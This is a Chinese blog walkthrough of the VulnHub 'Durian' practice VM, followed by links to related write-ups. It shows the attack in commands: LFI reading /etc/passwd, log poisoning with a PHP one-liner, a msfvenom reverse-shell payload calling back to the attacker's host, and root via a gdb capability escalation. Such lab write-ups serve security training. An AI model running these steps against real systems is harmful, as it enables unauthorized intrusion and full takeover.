vulnhub-durian

已于 2022-06-28 10:17:47 修改
阅读量843 收藏 1
点赞数 1
分类专栏: 渗透测试 安全漏洞 内网渗透 文章标签: 渗透测试 安全 安全漏洞
于 2021-02-14 23:32:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/113812243
版权

靶机:durian

下载地址:Durian: 1 ~ VulnHub

实验机:kali 2020   windows 10

1.信息收集

1.nmap信息收集

sudo nmap -sS -sV -sC 10.7.184.0/24       //收集信息

得到信息

目标的ip:10.7.184.6

开启的端口和服务  22/tcp  ssh  , 80/tcp   http ,8088/tcp  radan-http

7080/tcp open  ssl/empowerid  LiteSpeed

2.漏洞端口漏洞探测

在kali中 使用searchsploit软件,搜索端口是否存在漏洞

sudo searchsploit OpenSSH 7.9p1

没有找到漏洞

3.http目录端口探测

在kali使用gobuster 进行目录探索

sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.7.184.6/  -x jsp

8088端口

sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.7.184.6:8088/  -x jsp

2.漏洞发现

1.目录探索

先探索8088端口,就只有一个登陆窗口,和OpenLiteSpeed 的用户手册好像没有用。

再探索一下80端口

http://10.7.184.6/cgi-data/getImage.php    查看源代码,发现有代码泄露,文件包含

通过应用参数file,实现访问,成功

http://10.7.184.6/cgi-data/getImage.php?file=../../../../../../etc/passwd

使用Wfuzz探测一下

3.漏洞利用

访问一下日志文件

http://10.7.184.6/cgi-data/getImage.php?file=/var/log/durian.log/access.log

可以进行文件包含,没有文件上传的地点,所以可以上传一句话木马到日志文件上,再进行包含

上传一句话木马,查看反显。插入成功

ps:命令的访问需要访问两次,才能显现

3.使用msf连接

在kali中创建一个shell.txt的payload文件

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.7.184.2 LPORT=9999 -f raw > shell.txt

在kali中打开监听:

python3 -m http.server 8888

使用burpsuit 下载文件shell到/var/www/html/blog/shell.php  文件下

打开msf 设置攻击模块,设置payload,注意这个payload必须和前面设置的一样。

然后run

然后在目标地址启动payload

http://10.7.184.6/blog/shell.php

最后在msf中 就可以成功连接

4.提权

1.linux提权

meterpreter > shell -t
www-data@durian:/var/www/html$ sudo -l

www-data@durian:/var/www/html$ getcap -r / 2>/dev/null
www-data@durian:/$ gdb -nx -ex 'python import os;os.setuid(0)' -ex '!bash' -ex quit 

ok  成功提权

Durian: 1 Vulnhub Walkthrough - Hacking Articles

HEAVM
关注
专栏目录
Vulnhub-Basilic
KAKA的博客
07-10 612
灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~ [注:从源地址下载出得知需要拿到 4 个 flag] 利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24 继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18 可以看到下列信息: http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~ 点击 contact me,得到
DurIAN模型介绍
行者AI
12-28 994
本文首发于:行者AI TTS是一种将文本文字转变成人类语言信号的一种技术。TTS技术优劣的评判标准是生成的语音信号是否正确、清晰、自然。传统的TTS技术包括拼接法和参数法,但是这两种方法生成的语音信号不自然。端到端的TTS技术能够获得相对比较自然的合成效果,但是同样会出现生成效果不稳定、文字重复或者遗漏等缺点。Expressive TTS是目前语音合成领域中比较活跃的方向,它和单纯TTS的区别是,它更关注合成声音的风格、情感、韵律等等。普通的端到端TTS技术很难精确控制合成结果的韵律、停顿、节奏。 Du.
vulnhub之Durian复现过程
鲨鱼辣椒的博客
06-30 2535
这个靶场还是有些难度的,我之前就试过一次了,卡在一个地方很久后面实在没办法就先放弃了。这两天学习过程中我感觉我好像突然又悟了,所以又把它掏出来,准备今天就拿下它。必拿下! 信息搜集 还是老样子三板斧 扫描网段 目的找到网站的真实IP地址,如果是在真实环境中这一步应该是绕过CDN,或者是搜集一些子域名、旁站c段等一些信息 扫描端口以及开启的各种服务 基本上就扫出来这几个端口和服务,然后8088这个端口的服务是radan—http,我之前没见过就去搜了一下:端口本身(8088)最初注册到
VulnHub渗透测试实战靶场-Durian:1
LYJ20010728的博客
08-20 1312
VulnHub渗透测试实战靶场-Durian:1环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.141 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1199
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
VulnHub——DC-3
菜鸟的学习笔记
12-30 206
DC-3 信息搜集 使用nmap进行探测和扫描 已知信息: CMS为Joomla 访问网页,没有多余的提示,表明仅有一个入口点。 搜索后得知访问/modules/mod_login/mod_login.xml文件可以查看版本,发现版本为3.1,并且发现了一个路径。 /administrator/components/com_menus/models/fields,/adminisrtator为后台登陆页面。 漏洞挖掘与利用 1、既然发现是Joomla,那么从github查找相应的工具进行攻击。 找到
VulnHub—DC-7
weixin_39219503的博客
02-02 475
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
durian-管理后台UI样式框架
最新发布
04-08
在解压后的"Durian-master"文件中,我们可能会发现以下结构: - `src`目录:包含了框架的源代码,包括CSS、JavaScript、图片和其他资源。 - `dist`目录:包含了编译后的可直接用于生产的文件。 - `docs`目录:存放...
Durian Web Application Server-开源
04-24
DURIAN是免费的Delphi Web应用程序服务器,用于在Windows(Delphi)和Linux(Kylix)的Pascal服务器端html嵌入脚本语言中制作交互式动态Web文档。
durian-debug:实用的工具,可快速进行肮脏的调试和性能分析
04-27
DurianDebug是一款面向Java开发者的实用工具,专为快速、高效地进行调试和性能分析而设计。这个开源项目提供了一系列的工具和功能,帮助开发者在遇到复杂问题时能够迅速定位和解决问题,提升开发效率。...
durian:榴莲Debian部署者
05-10
Durian是一套工具,用于自动安装基于Debian的操作系统,特别是Ubuntu。 您可以创建部分Debian软件包归档镜像,轻松设置PXE网络启动并定义几个自定义模板。 最后,您只需一个命令即可部署系统。 部署可以在物理机或...
vulnhub靶场,Durian
kukudeshuo的博客
07-23 328
vulnhub靶场,Durian 环境准备 靶机下载地址:https://www.vulnhub.com/entry/durian-1,553/ 攻击机:kali(192.168.109.128) 靶机:Durian(192.168.109.140) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.140 使用nmap扫描差点目标靶机端口开放情况
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
Vulnhub--Gaara
从不专注的人的博客
06-16 437
目录Vulnhub--Gaara信息收集扫描目标网段扫描端口及服务版本目录扫描漏洞利用hydra破解ssh登陆进行提权查看文件 Vulnhub–Gaara 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 信息收集 扫描目标网段 我们先使用nmap命令扫描网段 扫描端口及服务版本 然后我们访问80端口,没有发现什么有用的信息 目录扫描 然后我们来进行目录扫描 dir -u http://172.16.58.138/ -w /usr/share/dir
VulnHub_FunBox
qq_45434762的博客
08-29 589
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
1、VulnHub(基础准备)
weixin_43850732的博客
06-24 281
1、vulnhub基础准备扫描靶机IPNmapArp-scanNetdiscover开启简易HTTP服务python方式php方式 扫描靶机IP 默认在导入靶机镜像后是不知道靶机IP地址的,第一步是扫描发现到靶机的IP地址。 Nmap ping 扫描 nmap -sP 192.168.100.1/24 no ping 扫描 nmap -nP 192.168.100.1/24 Arp-scan arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批
Vulnhub_Noob
qq_45434762的博客
09-18 1391
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息Kali:192.168.31.216Noob:192.168.31.192信息收集使用Nmap扫描探测目标主机开放了21、80、55055三个端口nmap -sS -p- 192.168.31...
Vulnhub DC-6
柠檬木有枝
07-14 490
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
VulnHub-toppo
江左盟的博客
06-11 1万+
信息收集 漏洞发现 漏洞利用 q
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值